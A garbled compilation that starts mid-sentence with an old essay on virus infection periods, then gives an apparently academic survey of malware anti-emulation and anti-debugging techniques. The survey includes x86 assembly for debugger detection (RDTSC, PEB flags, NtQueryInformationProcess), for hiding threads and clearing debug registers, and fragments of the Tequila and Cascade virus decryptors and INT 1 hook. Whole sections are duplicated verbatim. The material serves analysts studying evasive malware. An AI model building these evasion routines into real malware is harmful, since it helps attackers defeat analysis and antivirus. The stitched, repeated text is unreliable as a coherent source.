Alt-Del on an MS-DOS PC, and thus are able to survive a "warm
boot.") The most successful of the file infectors, the Jerusalem
virus, is resident, as are all boot sector infectors. (For
fairly obvious reasons; the boot sector is never "called" in
normal operation.)
If a virus is active in memory, it is a waste of time trying to
disinfect a file or disk. No sooner is the file "cleaned", than
it becomes a suitable target for re-infection. You may try to
disinfect a hard disk right down to performing a low level
format: as soon as the disk is reformatted it may be infected all
over again. This is why all directions for disinfection stress
the necessity of "cold" booting from a disk that is known to be
free of infection before attempting any cleanup.
In attempting to protect against viral infection, and
particularly when trying to disinfect systems, it is important to
bear in mind the times that the virus is actively "infectious".
The viral activation is not the same as the activation of the
payload that a virus may carry. For example, the payload of the
original "Stoned" virus was a message which appeared on the
screen saying "Your PC is now Stoned!". This message only
appears at boot time, and on only one eighth of the times the
computer is rebooted. The virus, however, is infectious at all
times, if it has infected the hard disk.
There are basically three possibilities for the infectious
period: now ("one-shot"), during program run ("while called") or
from now on (resident). These periods may be modified by other
circumstances. A resident virus may remain in memory, but only
be actively infecting when a disk is accessed. A "while called"
virus may only infect a new program when a directory is changed.
"One-shot" viri only get one chance on each "run" of the infected
program. The viral code will seek out and infect a target
program. They then pass control to the original program, and
perform no further functions. These are, of course, the simplest
of the viral programs. Mainframe "mail" viri are generally of
this type.
The second class will activate when the infected program is
called, and then pass partial control to the original program.
The virus, however, will remain operational during the time that
the infected program is running. If this can be accomplished, it
is only a slight jump to write a fully memory resident virus.
Resident viri are the most successful, and the most dangerous, of
viral programs. A resident virus will become active when an
infected program is run (or at boot time for boot sector
infectors), and remain active until the computer is rebooted or
turned off. (Some viral programs are even able to trap the
rebooting sequence that is normally called when you press Ctrl-
Alt-Del on an MS-DOS PC, and thus are able to survive a "warm
boot.") The most successful of the file infectors, the Jerusalem
virus, is resident, as are all boot sector infectors. (For
fairly obvious reasons; the boot sector is never "called" in
normal operation.)
If a virus is active in memory, it is a waste of time trying to
disinfect a file or disk. No sooner is the file "cleaned", than
it becomes a suitable target for re-infection. You may try to
disinfect a hard disk right down to performing a low level
format: as soon as the disk is reformatted it may be infected all
over again. This is why all directions for disinfection stress
the necessity of "cold" booting from a disk that is known to be
free of infection before attempting any cleanup.
Anti-debugging and Anti-emulation Techniques (part 2)
2.3 Overextending the emulator
Overextending the emulator is defined as executing a set of instructions that will cause the emulator to crash or that may indicate that an emulator is running. Calling undocumented instructions that an emulator may not support is one way to cause the emulator to throw an exception and stop running. One such example is the undocumented CPU Instruction SALC that is used in W95/Vulcano [9]. Another way to detect emulation or to crash the emulator currently running, if there is one, is to try to access large portions of memory at once [1]. This is usually not effective though because most operating systems, as well as emulators, will impede the program.
A way to detect whether an emulator is running is to call a function twice that should return two different values. An example of this would be calling any of the time functions twice, and verifying that there is a difference between two return values. In Windows this can be achieved through kernel32!QueryPerformanceCounter which wraps ZwQueryPerformaceCounter, kernel32!GetTickCounter, or by querying the current number of CPU cycles executed since the machine started using the RDTSC (read time stamp counter) instruction. An example of the latter is below [15].
push offset handler
push dword ptr fs:[0]
mov fs:[0],esp
rdtsc
push eax
xor eax, eax
div eax ;trigger exception
rdtsc
sub eax, [esp] ;ticks delta
add esp, 4
pop fs:[0]
add esp, 4
cmp eax, 10000h ;threshold
jb @not_debugged
@debugged:
...
@not_debugged:
...
handler:
mov ecx, [esp+0Ch]
add dword ptr [ecx+0B8h], 2 ;skip div
xor eax, eax
ret
The example above shows how the RDTSC instruction can be used to detect whether a debugger is present. In this case, RDTSC is called twice and the difference of the two values returned is found. This difference is then compared to a threshold (in this example it is 10000h). If the difference is greater, than a debugger is present and a jump away from the malicious code is executed.
Importing obscure libraries may not actually cause the emulator to stop running, but if the library is not imported, the malware code itself may not run.
Malware can also look for webpages to see if it has access to the internet. This is something that can also cause the virus code to not execute on a machine that is not currently connected to the internet, but also stops execution when an emulator is running since most emulators do not allow internet access [1].
Using coprocessor FPU instructions is another way to overextend the emulator because most emulators do not emulate the FPU instructions. Prizzy polymorphic engine (PPE) can generate 43 different coprocessor instructions for the use of its polymorphic decryptor. If these FPU instructions are not provided, the decryption on Prizzy does not execute.
Along the same lines, malware can use MMX instructions. This instruction set adds 8 new registers to the architecture. The malware will check to see if MMX support exists by using the CPUID instruction. Examples of malware that use this technique are W32/Legacy and W32/Thorin.
Malware will also setup an exception handler, execute a garbage block of code, and then indirectly execute its own handler to transfer control to another part of the polymorphic decryptor. This is done in hopes that the emulator cannot handle the exception [9]. An example that is similar to this technique is shown in section 3.7.
3. Anti-debugging
Anti-debugging techniques are usually any attempt of the malware to monitor its own code to detect debugging. To do this, the malware can examine its own code for breakpoints or check for a debugger directly through system calls.
3.1 Breakpoints
To examine its code for breakpoints, the malware can look for the 0xcc opcode instruction, which raises a SIGTRAP. This is the instruction the debugger will use to gain control from the malware at a breakpoint. The malware can also set false breakpoints if the malware code itself has a signal handler. This way it can continue to execute instructions after the breakpoint that it set.
Malware can also try to overwrite the breakpoints. W95/Marburg virus uses a backwards decryption loop for the virus to overwrite the breakpoint. The viruses in the Yankee_doodle family, on the other hand, use hamming code to self correct their code. Hamming code allows programs to detect and correct errors, but in this case allows the virus to detect and remove breakpoints in its code [9].
3.2 Calculating the checksum
Malware can also checksum its own code. If the checksum has changed, then the virus can assume that it is being debugged and there have been breakpoints placed within the code [3]. VAMPiRE is an anti-anti debugging tool that gets around the detection of breakpoints [12]. VaMPiRE accomplishes this by keeping a table of breakpoints in memory to maintain a list of the breakpoints that have been set. The program consists of a page-fault handler (PFH), a general protection fault handler (GPFH), a single-step handler and a framework API. When a breakpoint is triggered either the PFH (handles breakpoints set on code, data, or memory mapped I/O) or the GPFH (handles legacy I/O breakpoints) receives control. The single-step handler is used for breakpoint persistence, allowing breakpoints to be used more than once.
3.3 Detecting the debugger
A very simple way of detecting a debugger on a Linux system is to simply call Ptrace, since Ptrace can’t be called in succession more than once for a specific process [3]. In Windows, the system call isDebuggerPresent will return 1 if the program is being debugged and 0 otherwise. This system call simply checks a flag that has been set by the debugger if it is running. This check can be done directly by checking the second byte in the Process Environment Block. The following code is an example of this technique.
mov eax, fs:[30h]
move eax, byte [eax+2]
test eax, eax
jne @DdebuggerDetected
As the above example shows, eax is set to the PEB (Process Environment Block) and the second byte of that block is then accessed and the contents moved into eax. A check is done to see whether eax is zero. If it is, then there is no debugger present, if not, then there is a debugger.
When a process is created with a debugger already running, the system sets certain flags for the heap manipulation routines in the Windows dll ntdll.dll. These flags are FLG_HEAP_ENABLE_TAIL_CHECK, FLG_HEAP_ENABLE_FREE_CHECK, and FLG_HEAP_VALIDATE_PARAMETERS. These flags can be checked using the following code:
mov eax, fs:[30h]
mov eax, [eax+68h]
and eax, 0x70
test eax, eax
jne @DebuggerDetected
In the above example, we again access the PEB and then get the start of the flags for the heap manipulation routine by adding 68h as an offset to the address of the PEB. The flags are then checked to see if a debugger is present.
Checking flags within heap headers such as the ForceFlags is another way to detect whether a debugger is running or not. Here is an example [15]:
mov eax, fs:[30h]
mov eax, [eax+18h] ;process heap
mov eax, [eax+10h] ;heap flags
test eax, eax
jne @DebuggerDetected
The above example shows how the process heap and the heap flags can be accessed from the offset of the PEB. These are then tested to see if the Force Flags were previously set by a debugger currently running.
Another possible way to detect the debugger is through the use of the NtQueryInformationProcess syscall. This function can be called with ProcessInformationClass set to 7, which refers to the ProcessDebugPort, and the function will return -1 if the process is being debugged. Below is an example [15].
push 0
push 4
push offset isdebugged
push 7 ;ProcessDebugPort
push -1
call NtQueryInformationProcess
test eax, eax
jne @ExitError
cmp isdebugged, 0
jne @DebuggerDetected
In this example, the parameters for the NtQueryInformationProcess syscall are first pushed onto the stack. These parameters are as follows: the first is the handle (in this case 0), the second is the process information length (4 bytes in this example), the following is the process information class (in this case 7, specifying the ProcessDebugPort), the next is the variable used to return whether or not there is a debugger present. If this value is non-zero then the process is being run under a debugger. If not, then all is well. The last parameter is the return length. NtQueryInformationProcess is then called with these parameters and a return value is placed in isdebugged. This is later tested to see if it equals zero, or not.
Other simple ways of detecting the debugger is by checking to see if the device list contains the name of a debugger, by checking the registry keys for a debugger, or by scanning memory to detect the debugger’s code in memory [9].
Another method, similar to the EPO method, is to instruct the PE loader that the entry point of the program is referenced in the Thread Local Storage (TLS) entry in the PE header. This has the effect of causing the code in the TLS to execute first instead of the read entry point of the program. Therefore, the TLS can perform anti-debugging checks before the program even starts [15]. Starting on the TLS also allows the virus to begin execution before the debugger starts, since some debuggers break on the main entry point of the program [9].
3.4 Checking for single stepping
Other ways that the malware can detect a debugger is to check for single stepping. Checking for single stepping can be done by adding a value above the stack pointer and then checking to see if the value is still there. If the value is there, this means that the code is being single stepped. When a debugger is single stepping a process, it will push instructions onto the stack when it takes control and pop them back off the stack before it executes the next instruction. So if the value is still there that means that something other than the running process has been using the stack [1]. Below is a code example of how malware can detect single stepping by using the stack state [9]:
mov bp, sp ; pick stack pointer
push ax ; store any ax mark on the stack
pop ax ; pick the value from the stack
cmp word ptr [bp-2], ax ; compare against stack
jne debug ; if different, debugger detected.
As the comments in this example show, a value is pushed onto the stack then popped off the stack. If the debugger is present, then the value at the top of the stack pointer – 2 will be different than the value that was just popped off the stack and the appropriate action can be taken.
3.5 Checking for slowdown in runtime
By looking for slowdown in the runtime of the program, malicious code can also detect a debugger. A significant slowdown in runtime likely means that the code is being single stepped. So if the difference in the timestamp for 2 different calls is too great, the malware can act accordingly [1]. LTTng/LTTV Linux Trace Toolkit gets around the slowdown problem to trace a virus. This is because LTTng/LTTV is a modular tool that traces the program without adding breakpoints or performing any analysis at the time of execution. It also uses a lockless re-entry mechanism, meaning that it does not lock any portions of the Linux kernel code that the program being traced might need to use, and therefore does not cause the traced program to slow down and wait [4].
3.6 Instruction prefetching
If the malicious code modifies the next instruction in a sequence and the new instruction is executed, then a debugger is running. This is due to instruction prefetching; if the new instruction is prefetched, this means there was a break in the execution of the process. Otherwise the original instruction would have been prefetched and executed [1].
3.7 Self modifying code
The malware can also self-modify other code. One example of this is HDSpoof. This malware starts out with exception handlers and then removes them during execution. That way, if anything goes wrong and an exception is thrown by the process during execution, the virus will terminate. It also modifies the exception handlers at other times during execution by either removing or adding exception handlers. Below is an example of HDSpoof removing all exception handlers except for the default one [7].
exception handlers before:
0x77f79bb8 ntdll.dll:executehandler2@20 + 0x003a
0x0041adc9 hdspoof.exe+0x0001adc9
0x77e94809 __except_handler3
exception handlers after:
0x77e94809 __except_handler3
0x41b770: 8b44240c mov eax,dword ptr [esp+0xc]
0x41b774: 33c9 xor ecx,ecx
0x41b776: 334804 xor ecx,dword ptr [eax+0x4]
0x41b779: 334808 xor ecx,dword ptr [eax+0x8]
0x41b77c: 33480c xor ecx,dword ptr [eax+0xc]
0x41b77f: 334810 xor ecx,dword ptr [eax+0x10]
0x41b782: 8b642408 mov esp,dword ptr [esp+0x8]
0x41b786: 648f0500000000 pop dword ptr fs:[0x0]
Below is code in which HDSpoof creates a new exception handler [7].
0x41f52b: add dword ptr [esp],0x9ca
0x41f532: push dword ptr [dword ptr fs:[0x0]
0x41f539: mov dword ptr fs:[0x0],esp
3.8 Overwriting debugger information
Some malware uses techniques that can override debugger information and therefore cause either the debugger or the virus itself to function improperly.
By hooking the INT 1 and INT 3 ( INT3 is the 0xCC opcode byte that debuggers use) interrupts, malware can cause the debugger to lose its context. This is harmless during normal execution of the virus. Another option is to hook the interrupts and call another interrupt to run the virus code indirectly. Below is the code to the Tequila virus that hooks INT 1.
new_interrupt_one:
push bp
mov bp,sp
cs cmp b[0a],1 ;masm mod. needed
je 0506 ;masm mod. needed
cmp w[bp+4],09b4
ja 050b ;masm mod. needed
push ax
push es
les ax,[bp+2]
cs mov w[09a0],ax ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
cs mov b[0a],1
pop es
pop ax
and w[bp+6],0feff
pop bp
iret
Normally the hook routine is set to IRET, as it is without a debugger installed. V2Px uses hooks to decrypt its body with INT 1 and INT 3. The INT 1 and INT 3 vectors are used continuously during execution of the code and calculations are done in the interrupt vector table.
Some viruses also clear the contents of the debug registers (DRn) [9]. This can be done in one of two ways. One way is to use the NtGetContextThread and NtSetContextThread syscalls. Another way is to generate an exception, modify the thread context and then resume normal execution with the new context. An example of this is below [15].
push offset handler
push dword ptr fs:[0]
mov fs:[0],esp
xor eax, eax
div eax ;generate exception
pop fs:[0]
add esp, 4
;continue execution
;...
handler:
mov ecx, [esp+0Ch] ;skip div
add dword ptr [ecx+0B8h], 2 ;skip div
mov dword ptr [ecx+04h], 0 ;clean dr0
mov dword ptr [ecx+08h], 0 ;clean dr1
mov dword ptr [ecx+0Ch], 0 ;clean dr2
mov dword ptr [ecx+10h], 0 ;clean dr3
mov dword ptr [ecx+14h], 0 ;clean dr6
mov dword ptr [ecx+18h], 0 ;clean dr7
xor eax, eax
ret
The first line of the above example pushes the offset of the handler onto the stack to make sure that its own handler will get control when the exception is thrown. Then setup is done in for control to transfer to the handler, including setting eax to zero by XORing it with itself. The div eax instruction generates and exception because eax is zero, so AX is being divided by zero. The handler then skips the divide instruction, cleans dr0-dr7, sets eax to zero again, indicating that the exception was handled, and execution is resumed.
3.9 Detaching the debugger thread
Detaching the thread from the debugger can be done with the NtSetInformationThread syscall. Calling this function with ThreadInformationClass set to 0x11 (ThreadHideFromDebugger), will detach the program’s thread from the debugger if there is a debugger present. The following code is an example [15]:
push 0
push 0
push 11h ;ThreadHideFromDebugger
push -2
call NtSetInformationThread
In this example, the parameters for the NtSetInformationThread are first pushed onto the stack and then the function is called removing the program’s thread from the debugger. This is done because 0 is passed in for the thread information length and thread information, -2 is passed on for the thread handle, and 11h is passed in for the thread information class which is the ThreadHideFromDebugger value.
3.10 Decryption
Decryption can be done in several different ways that also protect against debugging. Some decryption depends upon a specific execution path. If this execution path is not followed, due to a debugger being started at a specific point in the program, the value that the decryption algorithm uses may be incorrect. Therefore, the program will not decrypt itself correctly. HDSpoof uses this technique [7].
Some viruses use the stack to decrypt their code. Using a debugger on such a virus causes the decryption to fail, because the stack is used by INT 1 during debugging. One example is the W95/SK virus that decrypts and builds its code on the stack. Another example of this is the Cascade virus that uses the stack pointer register for one of the decryption keys. Below is the code:
lea si, Start ; position to decrypt
mov sp, 0682 ; length of encrypted body
Decrypt:
xor [si], si ; decryption key/counter 1
xor [si], sp ; decryption key/counter 2
inc si ; increment one counter
dec sp ; decrement the other
jnz Decrypt ; loop until all bytes are decrypted
Start: ; Virus body
The comments on the above example explain fairly well how the Cascade virus uses the stack pointer to decrypt the virus body. The Cryptor virus, on the other hand, stores its encryption keys in the keyboard buffer, which is also destroyed by a debugger. Tequila uses the decryptor’s code as the decryption key, so if the decryptor is modified with a debugger the virus will not be decrypted [9]. Below is the Tequila decryption code [13]:
perform_encryption_decryption:
mov bx,0
mov si,0960
mov cx,0960
mov dl,b[si]
xor b[bx],dl
inc si
inc bx
cmp si,09a0
jb 0a61 ;masm mod. needed
mov si,0960
loop 0a52 ;masm mod. needed
ret
the_file_decrypting_routine:
push cs
pop ds
mov bx,4
mov si,0964
mov cx,0960
mov dl,b[si]
add b[bx],dl
inc si
inc bx
cmp si,09a4
jb 0a7e ;masm mod. needed
mov si,0964
loop 0a6f ;masm mod. needed
jmp 0390 ;masm mod. needed
Research is being done on new anti-debugging methods that may be used in the future. One such project works on a multiprocessor computer in which one processor is unused while debugging. This new technique uses parallel processing of the decryption code [11].
4. Other Anti-detection Techniques
4.1 Retroviruses
Retroviruses try to disable the anti-virus software. They do this by carrying a list of process names and killing the processes the program finds running. Many retroviruses also take the process off of the startup list so the process no longer starts when the computer boots. This type of malware may also try to starve the anti-virus software of CPU time or prevent the anti-virus software from connecting to the company’s servers to update its database [1].
5. Combining Techniques
The W32.Gobi virus is a polymorphic retrovirus that uses EPO and several anti-debugging techniques. This virus opens a backdoor on TCP port 666 [8]
Simile (also known as Metaphor) is a very well known and complex virus that is approximately 14,000 lines of assembly [9]. This virus uses EPO by looking for the ExitProcess() API call. It is also a metamorphic virus that uses polymorphic decryption [1]. About 90% of its code is spent on the polymorphic decryption. The virus body and polymorphic decryptor are placed in a semi-random place in a newly infected file each time. The first payload of Simile only activates during March, June, September or December. Variants A and B display their message on the 17th of these months. Variant C displays its message on the 18th. The second payload activates on the 14th of May in variants A and B and on the 14th of July in variant C [9].
Ganda is a retrovirus that uses EPO. It examines the list of startup processes and replaces the first instruction of each startup process with a return. This renders any antivirus programs useless [1].
Overextending the emulator is defined as executing a set of instructions that will cause the emulator to crash or that may indicate that an emulator is running. Calling undocumented instructions that an emulator may not support is one way to cause the emulator to throw an exception and stop running. One such example is the undocumented CPU Instruction SALC that is used in W95/Vulcano [9]. Another way to detect emulation or to crash the emulator currently running, if there is one, is to try to access large portions of memory at once [1]. This is usually not effective though because most operating systems, as well as emulators, will impede the program.
A way to detect whether an emulator is running is to call a function twice that should return two different values. An example of this would be calling any of the time functions twice, and verifying that there is a difference between two return values. In Windows this can be achieved through kernel32!QueryPerformanceCounter which wraps ZwQueryPerformaceCounter, kernel32!GetTickCounter, or by querying the current number of CPU cycles executed since the machine started using the RDTSC (read time stamp counter) instruction. An example of the latter is below [15].
push offset handler
push dword ptr fs:[0]
mov fs:[0],esp
rdtsc
push eax
xor eax, eax
div eax ;trigger exception
rdtsc
sub eax, [esp] ;ticks delta
add esp, 4
pop fs:[0]
add esp, 4
cmp eax, 10000h ;threshold
jb @not_debugged
@debugged:
...
@not_debugged:
...
handler:
mov ecx, [esp+0Ch]
add dword ptr [ecx+0B8h], 2 ;skip div
xor eax, eax
ret
The example above shows how the RDTSC instruction can be used to detect whether a debugger is present. In this case, RDTSC is called twice and the difference of the two values returned is found. This difference is then compared to a threshold (in this example it is 10000h). If the difference is greater, than a debugger is present and a jump away from the malicious code is executed.
Importing obscure libraries may not actually cause the emulator to stop running, but if the library is not imported, the malware code itself may not run.
Malware can also look for webpages to see if it has access to the internet. This is something that can also cause the virus code to not execute on a machine that is not currently connected to the internet, but also stops execution when an emulator is running since most emulators do not allow internet access [1].
Using coprocessor FPU instructions is another way to overextend the emulator because most emulators do not emulate the FPU instructions. Prizzy polymorphic engine (PPE) can generate 43 different coprocessor instructions for the use of its polymorphic decryptor. If these FPU instructions are not provided, the decryption on Prizzy does not execute.
Along the same lines, malware can use MMX instructions. This instruction set adds 8 new registers to the architecture. The malware will check to see if MMX support exists by using the CPUID instruction. Examples of malware that use this technique are W32/Legacy and W32/Thorin.
Malware will also setup an exception handler, execute a garbage block of code, and then indirectly execute its own handler to transfer control to another part of the polymorphic decryptor. This is done in hopes that the emulator cannot handle the exception [9]. An example that is similar to this technique is shown in section 3.7.
3. Anti-debugging
Anti-debugging techniques are usually any attempt of the malware to monitor its own code to detect debugging. To do this, the malware can examine its own code for breakpoints or check for a debugger directly through system calls.
3.1 Breakpoints
To examine its code for breakpoints, the malware can look for the 0xcc opcode instruction, which raises a SIGTRAP. This is the instruction the debugger will use to gain control from the malware at a breakpoint. The malware can also set false breakpoints if the malware code itself has a signal handler. This way it can continue to execute instructions after the breakpoint that it set.
Malware can also try to overwrite the breakpoints. W95/Marburg virus uses a backwards decryption loop for the virus to overwrite the breakpoint. The viruses in the Yankee_doodle family, on the other hand, use hamming code to self correct their code. Hamming code allows programs to detect and correct errors, but in this case allows the virus to detect and remove breakpoints in its code [9].
3.2 Calculating the checksum
Malware can also checksum its own code. If the checksum has changed, then the virus can assume that it is being debugged and there have been breakpoints placed within the code [3]. VAMPiRE is an anti-anti debugging tool that gets around the detection of breakpoints [12]. VaMPiRE accomplishes this by keeping a table of breakpoints in memory to maintain a list of the breakpoints that have been set. The program consists of a page-fault handler (PFH), a general protection fault handler (GPFH), a single-step handler and a framework API. When a breakpoint is triggered either the PFH (handles breakpoints set on code, data, or memory mapped I/O) or the GPFH (handles legacy I/O breakpoints) receives control. The single-step handler is used for breakpoint persistence, allowing breakpoints to be used more than once.
3.3 Detecting the debugger
A very simple way of detecting a debugger on a Linux system is to simply call Ptrace, since Ptrace can’t be called in succession more than once for a specific process [3]. In Windows, the system call isDebuggerPresent will return 1 if the program is being debugged and 0 otherwise. This system call simply checks a flag that has been set by the debugger if it is running. This check can be done directly by checking the second byte in the Process Environment Block. The following code is an example of this technique.
mov eax, fs:[30h]
move eax, byte [eax+2]
test eax, eax
jne @DdebuggerDetected
As the above example shows, eax is set to the PEB (Process Environment Block) and the second byte of that block is then accessed and the contents moved into eax. A check is done to see whether eax is zero. If it is, then there is no debugger present, if not, then there is a debugger.
When a process is created with a debugger already running, the system sets certain flags for the heap manipulation routines in the Windows dll ntdll.dll. These flags are FLG_HEAP_ENABLE_TAIL_CHECK, FLG_HEAP_ENABLE_FREE_CHECK, and FLG_HEAP_VALIDATE_PARAMETERS. These flags can be checked using the following code:
mov eax, fs:[30h]
mov eax, [eax+68h]
and eax, 0x70
test eax, eax
jne @DebuggerDetected
In the above example, we again access the PEB and then get the start of the flags for the heap manipulation routine by adding 68h as an offset to the address of the PEB. The flags are then checked to see if a debugger is present.
Checking flags within heap headers such as the ForceFlags is another way to detect whether a debugger is running or not. Here is an example [15]:
mov eax, fs:[30h]
mov eax, [eax+18h] ;process heap
mov eax, [eax+10h] ;heap flags
test eax, eax
jne @DebuggerDetected
The above example shows how the process heap and the heap flags can be accessed from the offset of the PEB. These are then tested to see if the Force Flags were previously set by a debugger currently running.
Another possible way to detect the debugger is through the use of the NtQueryInformationProcess syscall. This function can be called with ProcessInformationClass set to 7, which refers to the ProcessDebugPort, and the function will return -1 if the process is being debugged. Below is an example [15].
push 0
push 4
push offset isdebugged
push 7 ;ProcessDebugPort
push -1
call NtQueryInformationProcess
test eax, eax
jne @ExitError
cmp isdebugged, 0
jne @DebuggerDetected
In this example, the parameters for the NtQueryInformationProcess syscall are first pushed onto the stack. These parameters are as follows: the first is the handle (in this case 0), the second is the process information length (4 bytes in this example), the following is the process information class (in this case 7, specifying the ProcessDebugPort), the next is the variable used to return whether or not there is a debugger present. If this value is non-zero then the process is being run under a debugger. If not, then all is well. The last parameter is the return length. NtQueryInformationProcess is then called with these parameters and a return value is placed in isdebugged. This is later tested to see if it equals zero, or not.
Other simple ways of detecting the debugger is by checking to see if the device list contains the name of a debugger, by checking the registry keys for a debugger, or by scanning memory to detect the debugger’s code in memory [9].
Another method, similar to the EPO method, is to instruct the PE loader that the entry point of the program is referenced in the Thread Local Storage (TLS) entry in the PE header. This has the effect of causing the code in the TLS to execute first instead of the read entry point of the program. Therefore, the TLS can perform anti-debugging checks before the program even starts [15]. Starting on the TLS also allows the virus to begin execution before the debugger starts, since some debuggers break on the main entry point of the program [9].
3.4 Checking for single stepping
Other ways that the malware can detect a debugger is to check for single stepping. Checking for single stepping can be done by adding a value above the stack pointer and then checking to see if the value is still there. If the value is there, this means that the code is being single stepped. When a debugger is single stepping a process, it will push instructions onto the stack when it takes control and pop them back off the stack before it executes the next instruction. So if the value is still there that means that something other than the running process has been using the stack [1]. Below is a code example of how malware can detect single stepping by using the stack state [9]:
mov bp, sp ; pick stack pointer
push ax ; store any ax mark on the stack
pop ax ; pick the value from the stack
cmp word ptr [bp-2], ax ; compare against stack
jne debug ; if different, debugger detected.
As the comments in this example show, a value is pushed onto the stack then popped off the stack. If the debugger is present, then the value at the top of the stack pointer – 2 will be different than the value that was just popped off the stack and the appropriate action can be taken.
3.5 Checking for slowdown in runtime
By looking for slowdown in the runtime of the program, malicious code can also detect a debugger. A significant slowdown in runtime likely means that the code is being single stepped. So if the difference in the timestamp for 2 different calls is too great, the malware can act accordingly [1]. LTTng/LTTV Linux Trace Toolkit gets around the slowdown problem to trace a virus. This is because LTTng/LTTV is a modular tool that traces the program without adding breakpoints or performing any analysis at the time of execution. It also uses a lockless re-entry mechanism, meaning that it does not lock any portions of the Linux kernel code that the program being traced might need to use, and therefore does not cause the traced program to slow down and wait [4].
3.6 Instruction prefetching
If the malicious code modifies the next instruction in a sequence and the new instruction is executed, then a debugger is running. This is due to instruction prefetching; if the new instruction is prefetched, this means there was a break in the execution of the process. Otherwise the original instruction would have been prefetched and executed [1].
3.7 Self modifying code
The malware can also self-modify other code. One example of this is HDSpoof. This malware starts out with exception handlers and then removes them during execution. That way, if anything goes wrong and an exception is thrown by the process during execution, the virus will terminate. It also modifies the exception handlers at other times during execution by either removing or adding exception handlers. Below is an example of HDSpoof removing all exception handlers except for the default one [7].
exception handlers before:
0x77f79bb8 ntdll.dll:executehandler2@20 + 0x003a
0x0041adc9 hdspoof.exe+0x0001adc9
0x77e94809 __except_handler3
exception handlers after:
0x77e94809 __except_handler3
0x41b770: 8b44240c mov eax,dword ptr [esp+0xc]
0x41b774: 33c9 xor ecx,ecx
0x41b776: 334804 xor ecx,dword ptr [eax+0x4]
0x41b779: 334808 xor ecx,dword ptr [eax+0x8]
0x41b77c: 33480c xor ecx,dword ptr [eax+0xc]
0x41b77f: 334810 xor ecx,dword ptr [eax+0x10]
0x41b782: 8b642408 mov esp,dword ptr [esp+0x8]
0x41b786: 648f0500000000 pop dword ptr fs:[0x0]
Below is code in which HDSpoof creates a new exception handler [7].
0x41f52b: add dword ptr [esp],0x9ca
0x41f532: push dword ptr [dword ptr fs:[0x0]
0x41f539: mov dword ptr fs:[0x0],esp
3.8 Overwriting debugger information
Some malware uses techniques that can override debugger information and therefore cause either the debugger or the virus itself to function improperly.
By hooking the INT 1 and INT 3 ( INT3 is the 0xCC opcode byte that debuggers use) interrupts, malware can cause the debugger to lose its context. This is harmless during normal execution of the virus. Another option is to hook the interrupts and call another interrupt to run the virus code indirectly. Below is the code to the Tequila virus that hooks INT 1.
new_interrupt_one:
push bp
mov bp,sp
cs cmp b[0a],1 ;masm mod. needed
je 0506 ;masm mod. needed
cmp w[bp+4],09b4
ja 050b ;masm mod. needed
push ax
push es
les ax,[bp+2]
cs mov w[09a0],ax ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
cs mov b[0a],1
pop es
pop ax
and w[bp+6],0feff
pop bp
iret
Normally the hook routine is set to IRET, as it is without a debugger installed. V2Px uses hooks to decrypt its body with INT 1 and INT 3. The INT 1 and INT 3 vectors are used continuously during execution of the code and calculations are done in the interrupt vector table.
Some viruses also clear the contents of the debug registers (DRn) [9]. This can be done in one of two ways. One way is to use the NtGetContextThread and NtSetContextThread syscalls. Another way is to generate an exception, modify the thread context and then resume normal execution with the new context. An example of this is below [15].
push offset handler
push dword ptr fs:[0]
mov fs:[0],esp
xor eax, eax
div eax ;generate exception
pop fs:[0]
add esp, 4
;continue execution
;...
handler:
mov ecx, [esp+0Ch] ;skip div
add dword ptr [ecx+0B8h], 2 ;skip div
mov dword ptr [ecx+04h], 0 ;clean dr0
mov dword ptr [ecx+08h], 0 ;clean dr1
mov dword ptr [ecx+0Ch], 0 ;clean dr2
mov dword ptr [ecx+10h], 0 ;clean dr3
mov dword ptr [ecx+14h], 0 ;clean dr6
mov dword ptr [ecx+18h], 0 ;clean dr7
xor eax, eax
ret
The first line of the above example pushes the offset of the handler onto the stack to make sure that its own handler will get control when the exception is thrown. Then setup is done in for control to transfer to the handler, including setting eax to zero by XORing it with itself. The div eax instruction generates and exception because eax is zero, so AX is being divided by zero. The handler then skips the divide instruction, cleans dr0-dr7, sets eax to zero again, indicating that the exception was handled, and execution is resumed.
3.9 Detaching the debugger thread
Detaching the thread from the debugger can be done with the NtSetInformationThread syscall. Calling this function with ThreadInformationClass set to 0x11 (ThreadHideFromDebugger), will detach the program’s thread from the debugger if there is a debugger present. The following code is an example [15]:
push 0
push 0
push 11h ;ThreadHideFromDebugger
push -2
call NtSetInformationThread
In this example, the parameters for the NtSetInformationThread are first pushed onto the stack and then the function is called removing the program’s thread from the debugger. This is done because 0 is passed in for the thread information length and thread information, -2 is passed on for the thread handle, and 11h is passed in for the thread information class which is the ThreadHideFromDebugger value.
3.10 Decryption
Decryption can be done in several different ways that also protect against debugging. Some decryption depends upon a specific execution path. If this execution path is not followed, due to a debugger being started at a specific point in the program, the value that the decryption algorithm uses may be incorrect. Therefore, the program will not decrypt itself correctly. HDSpoof uses this technique [7].
Some viruses use the stack to decrypt their code. Using a debugger on such a virus causes the decryption to fail, because the stack is used by INT 1 during debugging. One example is the W95/SK virus that decrypts and builds its code on the stack. Another example of this is the Cascade virus that uses the stack pointer register for one of the decryption keys. Below is the code:
lea si, Start ; position to decrypt
mov sp, 0682 ; length of encrypted body
Decrypt:
xor [si], si ; decryption key/counter 1
xor [si], sp ; decryption key/counter 2
inc si ; increment one counter
dec sp ; decrement the other
jnz Decrypt ; loop until all bytes are decrypted
Start: ; Virus body
The comments on the above example explain fairly well how the Cascade virus uses the stack pointer to decrypt the virus body. The Cryptor virus, on the other hand, stores its encryption keys in the keyboard buffer, which is also destroyed by a debugger. Tequila uses the decryptor’s code as the decryption key, so if the decryptor is modified with a debugger the virus will not be decrypted [9]. Below is the Tequila decryption code [13]:
perform_encryption_decryption:
mov bx,0
mov si,0960
mov cx,0960
mov dl,b[si]
xor b[bx],dl
inc si
inc bx
cmp si,09a0
jb 0a61 ;masm mod. needed
mov si,0960
loop 0a52 ;masm mod. needed
ret
the_file_decrypting_routine:
push cs
pop ds
mov bx,4
mov si,0964
mov cx,0960
mov dl,b[si]
add b[bx],dl
inc si
inc bx
cmp si,09a4
jb 0a7e ;masm mod. needed
mov si,0964
loop 0a6f ;masm mod. needed
jmp 0390 ;masm mod. needed
Research is being done on new anti-debugging methods that may be used in the future. One such project works on a multiprocessor computer in which one processor is unused while debugging. This new technique uses parallel processing of the decryption code [11].
4. Other Anti-detection Techniques
4.1 Retroviruses
